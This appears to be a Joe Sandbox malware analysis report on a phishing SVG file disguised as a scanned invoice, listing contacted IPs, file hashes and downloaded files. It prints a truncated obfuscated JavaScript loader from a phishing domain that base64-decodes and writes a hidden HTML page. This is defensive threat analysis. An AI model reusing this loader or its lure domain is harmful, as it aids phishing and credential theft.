                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                                          high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                            high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                              high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                                          high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                                  high
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                                    high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                                                          high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                                            high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                                              high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                                high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                                      high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                                        high
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule224902v2s19.xmlfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700950v1s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120651v0s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120402v21s19.xmlfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120642v0s19.xmlfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702950v1s19.xmlfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120629v0s19.xmlfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702651v1s19.xmlfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120623v0s19.xmlfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702201v1s19.xmlfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120658v0s19.xmlfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703951v0s19.xmlfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120676v0s19.xmlfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700651v1s19.xmlfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            142.250.80.46
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            1.1.1.1
                                                                                                                                                                                                                                            unknownAustralia
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            142.250.65.163
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            172.253.63.84
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            142.250.176.206
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            104.16.5.189
                                                                                                                                                                                                                                            developers.cloudflare.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            142.251.40.164
                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            142.251.41.14
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            142.251.16.84
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            151.101.194.137
                                                                                                                                                                                                                                            code.jquery.comUnited States
                                                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                                                            172.67.206.88
                                                                                                                                                                                                                                            wtlo2.vtjgyhvuo.esUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            142.250.176.195
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            104.17.25.14
                                                                                                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            104.16.2.189
                                                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.17
                                                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                            Analysis ID:1645347
                                                                                                                                                                                                                                            Start date and time:2025-03-21 17:33:09 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:15
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            Analysis Mode:stream
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:Scanned Inv#118953-0012345.svg
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal72.phis.winSVG@19/4@44/138
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .svg
                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.80.46, 142.250.176.195, 142.251.41.14, 142.251.16.84, 142.251.40.206, 142.250.80.78, 184.31.69.3, 172.202.163.200
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • VT rate limit hit for: wtlo2.vtjgyhvuo.es
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65360)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):196739
                                                                                                                                                                                                                                            Entropy (8bit):4.728111259122556
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                            MD5:73FA046D49F272FEC131769885FB15CC
                                                                                                                                                                                                                                            SHA1:E1757604A69A852547FA755D95DED5CB862D9513
                                                                                                                                                                                                                                            SHA-256:E80E41B4720D8AE8A77C1045979507A27BF50A0B3B577F1F8B87B63557F409F6
                                                                                                                                                                                                                                            SHA-512:418DEADE69E811D5D1562E6B4650327CDAF2BE8E4FB464437E8E0B698E95F7F414116676F44979FC534815503216A21E9E7FF25F3BF483976992B2F8952E62CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            URL:https://wtlo2.vtjgyhvuo.es/RGMO6oRV/
                                                                                                                                                                                                                                            Preview:<script>.eHYMWimGaz = atob("aHR0cHM6Ly93dGxvMi52dGpneWh2dW8uZXMvUkdNTzZvUlYv");.FQhwvOJeEp = atob("bm9tYXRjaA==");.GZYprmpUyR = atob("d3JpdGU=");.if(eHYMWimGaz == FQhwvOJeEp){.document[GZYprmpUyR](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IE5MRGxVTU1BcmcgPSB7CiAgZ2V0KHBTY2FwdlluU24sIEd5aElTUEdOekIpIHsKICAgIGNvbnN0IGV1b1pSYUJzZmsgPSBbLi4uR3loSVNQR056Ql0KICAgICAgLm1hcChxSlRoSXZmWEZGID0+ICsoJ+++oCcgPiBxSlRoSXZmWEZGKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3Qga21oYVVuT1hCVCA9IGV1b1pSYUJzZmsucmVwbGFjZSgvLns4fS9nLCBud3VjR1N
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                                                                                            Entropy (8bit):7.737931820487441
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                            MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                                                                                                                            SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                                                                                                                            SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                                                                                                                            SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            URL:https://developers.cloudflare.com/favicon.png
                                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                            File type:data
                                                                                                                                                                                                                                            Entropy (8bit):3.4782183855539905
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Lumena CEL bitmap (63/63) 60.58%
                                                                                                                                                                                                                                            • Corel Photo Paint (41/41) 39.42%
                                                                                                                                                                                                                                            File name:Scanned Inv#118953-0012345.svg
                                                                                                                                                                                                                                            File size:3'410 bytes
                                                                                                                                                                                                                                            MD5:1c3eec5466b41a5efe93ecb00f78b8ad
                                                                                                                                                                                                                                            SHA1:34a5c7443d18ded539f65206109a26cff44f0f08
                                                                                                                                                                                                                                            SHA256:f7c58f9d43a7ce1126d301001ea770e3dbee1fe1867f3cce0ee858c1ecf8599c
                                                                                                                                                                                                                                            SHA512:47414ba5a53a8c82d82bc3b6a55f33b60f9bea764dd3689750ad8be888b9a9fe20d350f8f370585ff84d2597db9f22406dcf1820d729677632747866ede5228e
                                                                                                                                                                                                                                            SSDEEP:96:p1Luib5qCF133Q4X4Ql3qCXNqfQf3iCqgl3Xin9yfqIq1dQIg4qq4IQlQqQQ1Q4/:7Luif
                                                                                                                                                                                                                                            TLSH:B261B232B3D1F10BA06E1A479D6E30311676A915583B41F882C759FC46F2B20C4FEBAE
                                                                                                                                                                                                                                            File Content Preview:<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.8.". .s.t.a.n.d.a.l.o.n.e.=.".n.o.".?.>.....<.s.v.g. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.0./.s.v.g.". .w.i.d.t.h.=.".4.0.0.". .h.e.i.g.h.t.=.".2.5.0.".>.....<.s.c.r.i
                                                                                                                                                                                                                                            Icon Hash:173149cccc490307